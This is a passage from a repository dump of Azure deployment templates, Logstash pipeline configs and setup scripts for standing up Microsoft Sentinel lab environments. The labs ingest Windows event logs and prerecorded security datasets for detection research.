`Microsoft-Windows-Sysmon/Operational` 17 | * `Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational` 18 | * `Microsoft-Windows-Bits-Client/Operational` 19 | * `Microsoft-Windows-TerminalServices-LocalSessionManager/Operational` 20 | * `Directory Service` 21 | * `Microsoft-Windows-DNS-Client/Operational` 22 | * `Microsoft-Windows-Windows Firewall With Advanced Security/Firewall` 23 | * `Windows PowerShell` 24 | * `Microsoft-Windows-PowerShell/Operational` 25 | * `Microsoft-Windows-WMI-Activity/Operational` 26 | * Windows 10 Workstations (Max. 10) 27 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 28 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 29 | * [OPTIONAL] Sysmon 30 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 31 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 32 | * [OPTIONAL] Command and Control (c2) options: 33 | * `empire` 34 | * `covenant` 35 | * `metasploit` 36 | * Remote Access Restrictions (`AllowPublicIP` default option) 37 | * Access via Azure Bastion (Recommended. Additional costs applied) 38 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10/demos/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 Demos 2 | 3 | | Items | Deploy | Deploy US Gov | 4 | | :---| :---| :--- | 5 | | Windows Microsoft Sentinel + Win10 Basic | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-Azure-Sentinel-Basic.json) | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-Azure-Sentinel-Basic.json) | 6 | | Microsoft Sentinel + Win10 + DCR (DCR Resource) | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-AzureResource.json) | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-AzureResource.json) | 7 | | Microsoft Sentinel + Win10 + DCR (Deployment Script Resource) | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-DeploymentScript.json) | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fdemos%2FWin10-DCR-DeploymentScript.json) | 8 | -------------------------------------------------------------------------------- /grocery-list/Win10/demos/Sysmon-For-Windows/README.md: -------------------------------------------------------------------------------- 1 | # Sysmon for Windows Lab Environment 2 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Logstash + Event Hub 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2Fcustom-log-pipeline%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2Fcustom-log-pipeline%2Fazuredeploy.json) 5 | 6 | 7 | ## Grocery Items 8 | 9 | * Microsoft Sentinel 10 | * Logstash Server 11 | * `logstash-output-azure_loganalytics` plugin 12 | * Azure Event Hub 13 | * [OPTIONAL] Security Datasets 14 | 15 | ## Ingesting Security Datasets? 16 | 17 | 1) Click on the **Deploy to Azure** badge 18 | 2) Set the following parameters: 19 | * Subscription 20 | * Resource Group 21 | * Workspace Name 22 | * Deploy Custom Logs Pipeline: Logstash 23 | * Add to Cart: security-small-datasets(1.1GB) or security-large-apt29(2GB) 24 | * Admin Username (Username for Linux VM - Logstash) 25 | * Admin Password (Password for Linux VM - Logstash) 26 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/linkedtemplates/customScript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Linux virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | "type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2019-03-01", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Azure.Extensions", 35 | "type": "CustomScript", 36 | "typeHandlerVersion": "2.1", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": {}, 39 | "protectedSettings": { 40 | "commandToExecute": "[parameters('commandToExecute')]", 41 | "fileUris": "[parameters('fileUris')]" 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/Dockerfile: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | FROM docker.elastic.co/logstash/logstash:7.5.2 5 | 6 | RUN logstash-plugin install microsoft-logstash-output-azure-loganalytics -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/config/logstash.yml: -------------------------------------------------------------------------------- 1 | pipeline.batch.size: 500 2 | config.reload.automatic: true 3 | config.reload.interval: 60s 4 | # pipeline.workers: 2 5 | # xpack.monitoring.elasticsearch.hosts: http://helk-elasticsearch:9200 6 | # log.level: warn 7 | # http.host: "0.0.0.0" 8 | # xpack.monitoring.enabled: true -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | mordor-logstash: 5 | build: ./ 6 | container_name: mordor-logstash 7 | logging: 8 | driver: "json-file" 9 | options: 10 | max-file: "9" 11 | max-size: "6m" 12 | volumes: 13 | - /opt/logstash/pipeline:/usr/share/logstash/pipeline 14 | - /opt/logstash/scripts:/usr/share/logstash/scripts 15 | - /opt/logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml 16 | - /opt/datasets:/usr/share/logstash/datasets 17 | entrypoint: /usr/share/logstash/scripts/logstash-entrypoint.sh 18 | environment: 19 | - xpack.monitoring.enabled=false 20 | - WORKSPACE_ID=${WORKSPACE_ID} 21 | - EVENTHUB_CONNECTIONSTRING=${EVENTHUB_CONNECTIONSTRING} 22 | - WORKSPACE_KEY=${WORKSPACE_KEY} 23 | - EVENTHUB_NAME=${EVENTHUB_NAME} 24 | restart: always 25 | networks: 26 | mordor: 27 | 28 | networks: 29 | mordor: 30 | driver: bridge -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/eventhub-input.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | # If codec => json is enabled, Azure Monitor adds a suffix to the property name. Reference: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/data-collector-api#record-type-and-properties) 5 | # If codec => json is not enabled, you will have to use the KSQL scalar function parse_json() to expose nested fields. Reference: https://docs.microsoft.com/en-us/azure/kusto/query/parsejsonfunction 6 | # Example: mordordata_CL | extend m=parse_json(Message) | where m.ProcessName contains "powershell" 7 | 8 | input { 9 | azure_event_hubs { 10 | event_hub_connections => ["${EVENTHUB_CONNECTIONSTRING}"] 11 | threads => 2 12 | initial_position => "end" 13 | #codec => "json" 14 | } 15 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/json-file-input.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | input { 5 | file { 6 | path => "/usr/share/logstash/datasets/*.json" 7 | start_position => "beginning" 8 | sincedb_path => "/dev/null" 9 | #codec => "json" 10 | } 11 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/loganalytics-output-usgov.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | output { 5 | microsoft-logstash-output-azure-loganalytics { 6 | workspace_id => "${WORKSPACE_ID}" 7 | workspace_key => "${WORKSPACE_KEY}" 8 | endpoint => "ods.opinsights.azure.us" 9 | custom_log_table_name => "prerecorded" 10 | plugin_flush_interval => 5 11 | } 12 | #stdout { codec => rubydebug } 13 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/pipeline/loganalytics-output.conf: -------------------------------------------------------------------------------- 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 2 | # License: GPL-3.0 3 | 4 | output { 5 | microsoft-logstash-output-azure-loganalytics { 6 | workspace_id => "${WORKSPACE_ID}" 7 | workspace_key => "${WORKSPACE_KEY}" 8 | custom_log_table_name => "prerecorded" 9 | plugin_flush_interval => 5 10 | } 11 | #stdout { codec => rubydebug } 12 | } -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/logstash/scripts/logstash-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # ********* Setting LS_JAVA_OPTS *************** 7 | if [[ -z "$LS_JAVA_OPTS" ]]; then 8 | while true; do 9 | # Check using more accurate MB 10 | AVAILABLE_MEMORY=$(awk '/MemAvailable/{printf "%.f", $2/1024}' /proc/meminfo) 11 | if [ "$AVAILABLE_MEMORY" -ge 900 ] && [ "$AVAILABLE_MEMORY" -le 1000 ]; then 12 | LS_MEMORY="400m" 13 | LS_MEMORY_HIGH="1000m" 14 | elif [ "$AVAILABLE_MEMORY" -ge 1001 ] && [ "$AVAILABLE_MEMORY" -le 3000 ]; then 15 | LS_MEMORY="700m" 16 | LS_MEMORY_HIGH="1300m" 17 | elif [ "$AVAILABLE_MEMORY" -gt 3000 ]; then 18 | # Set high & low, so logstash doesn't use everything unnecessarily, it will usually flux up and down in usage -- and doesn't "severely" despite what everyone seems to believe 19 | LS_MEMORY="$(( AVAILABLE_MEMORY / 4 ))m" 20 | LS_MEMORY_HIGH="$(( AVAILABLE_MEMORY / 2 ))m" 21 | if [ "$AVAILABLE_MEMORY" -gt 31000 ]; then 22 | LS_MEMORY="8000m" 23 | LS_MEMORY_HIGH="31000m" 24 | fi 25 | else 26 | echo "$HELK_ERROR_TAG $LS_MEMORY MB is not enough memory for Logstash yet.." 27 | sleep 1 28 | fi 29 | export LS_JAVA_OPTS="${HELK_LOGSTASH_JAVA_OPTS} -Xms${LS_MEMORY} -Xmx${LS_MEMORY_HIGH} " 30 | break 31 | done 32 | fi 33 | echo "Setting LS_JAVA_OPTS to $LS_JAVA_OPTS" 34 | 35 | # ********* Setting Logstash PIPELINE_WORKERS *************** 36 | if [[ -z "$PIPELINE_WORKERS" ]]; then 37 | # Get total CPUs/cores as reported by OS 38 | TOTAL_CORES=$(getconf _NPROCESSORS_ONLN 2>/dev/null) 39 | # try one more way 40 | [ -z "$TOTAL_CORES" ] && TOTAL_CORES=$(getconf NPROCESSORS_ONLN) 41 | # Unable to get reported cores 42 | if [ -z "$TOTAL_CORES" ]; then 43 | TOTAL_CORES=1 44 | echo "$HELK_ERROR_TAG unable to get number of CPUs/cores as reported by the OS" 45 | fi 46 | # Set workers based on available cores 47 | if [ "$TOTAL_CORES" -ge 1 ] && [ "$TOTAL_CORES" -le 3 ]; then 48 | PIPELINE_WORKERS=1 49 | # Divide by 2 50 | elif [ "$TOTAL_CORES" -ge 4 ]; then 51 | PIPELINE_WORKERS="$(( TOTAL_CORES / 2 ))" 52 | # some unknown number 53 | else 54 | echo "[!] eported CPUs/cores not an integer? not greater or equal to 1.." 55 | PIPELINE_WORKERS=1 56 | fi 57 | export PIPELINE_WORKERS 58 | fi 59 | echo "Setting PIPELINE_WORKERS to ${PIPELINE_WORKERS}" 60 | 61 | # *** Remove Default config **** 62 | rm -f /usr/share/logstash/pipeline/logstash.conf 63 | 64 | # ********** Starting Logstash ***************** 65 | echo "Running docker-entrypoint script.." 66 | /usr/local/bin/docker-entrypoint 67 | -------------------------------------------------------------------------------- /grocery-list/custom-log-pipeline/scripts/Get-Security-Datasets.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | usage(){ 7 | echo " " 8 | echo "Usage: $0 [option...]" >&2 9 | echo 10 | echo " -d What Security datasets you would like to import (SMALL_DATASETS or APT29" 11 | echo 12 | echo "Examples:" 13 | echo " $0 -d SMALL_DATASETS" 14 | echo " $0 -d LARGE_APT29" 15 | echo " " 16 | exit 1 17 | } 18 | 19 | # ************ Command Options ********************** 20 | while getopts :d:h option 21 | do 22 | case "${option}" 23 | in 24 | d) SECURITY_DATASETS=$OPTARG;; 25 | h) usage;; 26 | \?) usage;; 27 | : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;; 28 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;; 29 | esac 30 | done 31 | 32 | if ((OPTIND == 1)) 33 | then 34 | echo "No options specified" 35 | usage 36 | fi 37 | 38 | if [ -z "$SECURITY_DATASETS" ]; then 39 | echo "[!] Make sure you provide values for the Security Datasets (-d)" 40 | usage 41 | else 42 | case $SECURITY_DATASETS in 43 | SMALL_DATASETS) ;; 44 | LARGE_APT29) ;; 45 | *) echo "[!] ]Not a valid dataset option"; usage; exit 1;; 46 | esac 47 | 48 | # Stopping Container 49 | echo "Stopping Logstash.." 50 | docker stop logstash 51 | # Adding Logstash config 52 | wget -O /opt/logstash/pipeline/json-file-input.conf https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/grocery-list/custom-log-pipeline/logstash/pipeline/json-file-input.conf 53 | 54 | echo "Installing Git.." 55 | apt install -y git unzip 56 | 57 | echo "Cloning Security Datasets repo.." 58 | git clone https://github.com/OTRF/Security-Datasets.git /opt/Security-Datasets 59 | 60 | if [[ $SECURITY_DATASETS == "SMALL_DATASETS" ]]; then 61 | echo "Decompressing every small security dataset.." 62 | cd /opt/Security-Datasets/datasets/atomic/ 63 | find . -type f -name "*.zip" | grep -i 'host' | while read filename; do unzip -o -d /opt/logstash/datasets/ $filename; done; 64 | # find . -type f -name "*.tar.gz" -print0 | xargs -0 -I{} tar xf {} -C /opt/logstash/datasets/ 65 | elif [[ $SECURITY_DATASETS == "LARGE_APT29" ]]; then 66 | echo "Decompressing only APT29 Dataset.." 67 | cd /opt/Security-Datasets/datasets/compound/apt29 68 | find . -type f -name "*_manual.zip" -print0 | xargs -0 -I{} unzip {} -d /opt/logstash/datasets/ 69 | fi 70 | folder_size=$(du -ach /opt/logstash/datasets/ | tail -1 | cut -f1) 71 | echo "Extracted $folder_size in security event logs.." 72 | 73 | # Starting Container 74 | echo "Starting Logstash container" 75 | docker start logstash 76 | fi 77 | -------------------------------------------------------------------------------- /microsoft-sentinel/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fmicrosoft-sentinel%2Fazuredeploy.json) 4 | 5 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fmicrosoft-sentinel%2Fazuredeploy.json) 6 | -------------------------------------------------------------------------------- /microsoft-sentinel/azuredeploy.parameters.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "value": "Sentinel2Go" 7 | }, 8 | "pricingTier": { 9 | "value": "PerGB2018" 10 | }, 11 | "dataRetention": { 12 | "value": 30 13 | }, 14 | "immediatePurgeDataOn30Days": { 15 | "value": true 16 | }, 17 | "enableAdditionalLASolutions": { 18 | "value": [] 19 | }, 20 | "enableDataConnectorsKind": { 21 | "value": [] 22 | }, 23 | "enableLAFunctions": { 24 | "value": [] 25 | }, 26 | "postAnalyticRules": { 27 | "value": false 28 | }, 29 | "userAssignedIdentityName": { 30 | "value": "" 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/alerts/scheduledAlerts.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace" 9 | } 10 | }, 11 | "dataConnectors": { 12 | "type": "array", 13 | "metadata": { 14 | "description": "Data connectors: [\"AzureActivityLog\",\"SecurityEvents\",\"WindowsFirewall\",\"DnsAnalytics\"]. Reference: https://docs.microsoft.com/azure/templates/microsoft.operationalinsights/2020-03-01-preview/workspaces/datasources#microsoftoperationalinsightsworkspacesdatasources-object and https://github.com/Azure/Azure-Sentinel/blob/master/Tools/Sentinel-All-In-One/ARMTemplates/LinkedTemplates/scheduledAlerts.json" 15 | } 16 | }, 17 | "specificScheduledAlerts": { 18 | "type": "array", 19 | "metadata": { 20 | "description": "Name of specific scheduled alert rules to enable. Reference: https://github.com/Azure/Azure-Sentinel/tree/master/Detections" 21 | } 22 | }, 23 | "roleGuid": { 24 | "type": "string", 25 | "defaultValue": "[newGuid()]" 26 | } 27 | }, 28 | "functions": [], 29 | "variables": { 30 | "identityName": "[concat('userIdentity',uniqueString(resourceGroup().id))]", 31 | "initialArguments": "[concat('-Workspace ', parameters('workspaceName'), ' -ResourceGroup ', resourceGroup().name, ' -DataConnectors ', replace(replace(string(parameters('dataConnectors')), '[', ''), ']', ''))]", 32 | "alertArguments": "[if(empty(parameters('specificScheduledAlerts')), variables('initialArguments'), concat(variables('initialArguments'), ' -Alerts ', replace(replace(replace(string(parameters('specificScheduledAlerts')), '[', ''), ']', ''), ' ','_')))]" 33 | }, 34 | "resources": [ 35 | { 36 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities", 37 | "name": "[variables('identityName')]", 38 | "apiVersion": "2018-11-30", 39 | "location": "[resourceGroup().location]" 40 | }, 41 | { 42 | "type": "Microsoft.Resources/deploymentScripts", 43 | "apiVersion": "2020-10-01", 44 | "name": "sleep", 45 | "location": "[resourceGroup().location]", 46 | "kind": "AzurePowerShell", 47 | "dependsOn": [ 48 | "[concat('Microsoft.ManagedIdentity/userAssignedIdentities/', variables('identityName'))]" 49 | ], 50 | "properties": { 51 | "forceUpdateTag": "1", 52 | "azPowerShellVersion": "3.0", 53 | "arguments": "", 54 | "scriptContent": "Start-Sleep -Seconds 120", 55 | "supportingScriptUris": [], 56 | "timeout": "PT30M", 57 | "cleanupPreference": "Always", 58 | "retentionInterval": "P1D" 59 | } 60 | }, 61 | { 62 | "apiVersion": "2017-09-01", 63 | "type": "Microsoft.Authorization/roleAssignments", 64 | "name": "[parameters('roleGuid')]", 65 | "dependsOn": [ 66 | "[concat('Microsoft.Resources/deploymentScripts/', 'sleep')]" 67 | ], 68 | "properties": { 69 | "roleDefinitionId": "[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Authorization/roleDefinitions/', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]", 70 | "principalId": "[reference(resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', variables('identityName')), '2018-11-30', 'Full').properties.principalId]", 71 | "scope": "[resourceGroup().id]" 72 | } 73 | }, 74 | { 75 | "type": "Microsoft.Resources/deploymentScripts", 76 | "apiVersion": "2020-10-01", 77 | "name": "runPowerShellInline", 78 | "location": "[resourceGroup().location]", 79 | "kind": "AzurePowerShell", 80 | "identity": { 81 | "type": "UserAssigned", 82 | "userAssignedIdentities": { 83 | "[resourceID('Microsoft.ManagedIdentity/userAssignedIdentities/',variables('identityName'))]": {} 84 | } 85 | }, 86 | "dependsOn": [ 87 | "[concat('Microsoft.Authorization/roleAssignments/', parameters('roleGuid'))]" 88 | ], 89 | "properties": { 90 | "forceUpdateTag": "1", 91 | "azPowerShellVersion": "3.0", 92 | "arguments": "[variables('alertArguments')]", 93 | "primaryScriptUri": "https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/scripts/Enable-ScheduledAlerts.ps1", 94 | "supportingScriptUris": [], 95 | "timeout": "PT30M", 96 | "cleanupPreference": "OnSuccess", 97 | "retentionInterval": "P1D" 98 | } 99 | } 100 | ], 101 | "outputs": {} 102 | } 103 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/customScript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Linux virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | "type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2019-03-01", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Azure.Extensions", 35 | "type": "CustomScript", 36 | "typeHandlerVersion": "2.1", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": {}, 39 | "protectedSettings": { 40 | "commandToExecute": "[parameters('commandToExecute')]", 41 | "fileUris": "[parameters('fileUris')]" 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "vmName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name of the Windows virtual machine" 9 | } 10 | }, 11 | "extensionName": { 12 | "type": "string" 13 | }, 14 | "fileUris": { 15 | "type": "array" 16 | }, 17 | "commandToExecute": { 18 | "type": "string" 19 | }, 20 | "location": { 21 | "type": "string", 22 | "metadata": { 23 | "description": "Location for all resources." 24 | } 25 | } 26 | }, 27 | "resources": [ 28 | { 29 | "type": "Microsoft.Compute/virtualMachines/extensions", 30 | "apiVersion": "2016-08-30", 31 | "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]", 32 | "location": "[parameters('location')]", 33 | "properties": { 34 | "publisher": "Microsoft.Compute", 35 | "type": "CustomScriptExtension", 36 | "typeHandlerVersion": "1.8", 37 | "autoUpgradeMinorVersion": true, 38 | "settings": { 39 | "fileUris": "[parameters('fileUris')]", 40 | "commandToExecute": "[parameters('commandToExecute')]" 41 | } 42 | } 43 | } 44 | ] 45 | } 46 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/association.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to associate data collection rules to" 9 | } 10 | }, 11 | "dataCollectionRuleId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "The resource ID of the data collection rule that will be associated to the VMs deployed." 15 | } 16 | }, 17 | "dataCollectionRuleName": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Name of the data collection rule associated with the VMs deployed" 21 | } 22 | }, 23 | "location": { 24 | "type": "string", 25 | "metadata": { 26 | "description": "Location for all resources." 27 | }, 28 | "defaultValue": "[resourceGroup().location]" 29 | } 30 | }, 31 | "variables": {}, 32 | "resources": [ 33 | { 34 | "name": "[concat(parameters('virtualMachines')[copyIndex('vmDCRCopy')].vmName, '/microsoft.insights/', parameters('dataCollectionRuleName'))]", 35 | "type": "Microsoft.Compute/virtualMachines/providers/dataCollectionRuleAssociations", 36 | "apiVersion": "2019-11-01-preview", 37 | "location": "[parameters('location')]", 38 | "copy": { 39 | "name": "vmDCRCopy", 40 | "count": "[length(parameters('virtualMachines'))]" 41 | }, 42 | "properties": { 43 | "description": "Association of data collection rule. Deleting this association will break the data collection for this virtual machine.", 44 | "dataCollectionRuleId": "[parameters('dataCollectionRuleId')]" 45 | } 46 | } 47 | ], 48 | "outputs": {} 49 | } 50 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/creation-azureresource.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "ruleName": { 6 | "type": "String", 7 | "metadata": { 8 | "description": "Specifies the name of the data collection rule to create." 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Specifies the location in which to create the data collection rule." 15 | }, 16 | "defaultValue": "[resourceGroup().location]" 17 | }, 18 | "dataSources": { 19 | "type": "Object", 20 | "metadata": { 21 | "description": "The specification of data sources." 22 | } 23 | }, 24 | "dataFlows": { 25 | "type": "Array", 26 | "metadata": { 27 | "description": "The specification of data flows." 28 | } 29 | }, 30 | "destinations": { 31 | "type": "Object", 32 | "metadata": { 33 | "description": "The specification of destinations." 34 | } 35 | }, 36 | "tagsArray": { 37 | "type": "Object" 38 | } 39 | }, 40 | "resources": [ 41 | { 42 | "type": "microsoft.insights/dataCollectionRules", 43 | "apiVersion": "2021-04-01", 44 | "name": "[parameters('ruleName')]", 45 | "location": "[parameters('location')]", 46 | "tags": "[parameters('tagsArray')]", 47 | "properties": { 48 | "dataSources": "[parameters('dataSources')]", 49 | "destinations": "[parameters('destinations')]", 50 | "dataFlows": "[parameters('dataFlows')]" 51 | } 52 | } 53 | ], 54 | "outputs": { 55 | "dataCollectionRuleId": { 56 | "type": "String", 57 | "value": "[resourceId('microsoft.insights/dataCollectionRules', parameters('ruleName'))]" 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/creation-deploymentscript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceId": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Log Analytics workspace ID" 9 | } 10 | }, 11 | "workspaceResourceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace resource ID" 15 | } 16 | }, 17 | "dataCollectionRuleName": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Name for the data collection rule" 21 | } 22 | }, 23 | "dataSourcesFileUrl": { 24 | "type": "string", 25 | "metadata": { 26 | "description": "URL to download a Data Collection Rules Data Sources File (JSON File)." 27 | } 28 | }, 29 | "location": { 30 | "type": "string", 31 | "metadata": { 32 | "description": "Specifies the location in which to create the data collection rule." 33 | }, 34 | "defaultValue": "[resourceGroup().location]" 35 | }, 36 | "roleGuid": { 37 | "type": "string", 38 | "defaultValue": "[newGuid()]" 39 | } 40 | }, 41 | "functions": [], 42 | "variables": { 43 | "identityName": 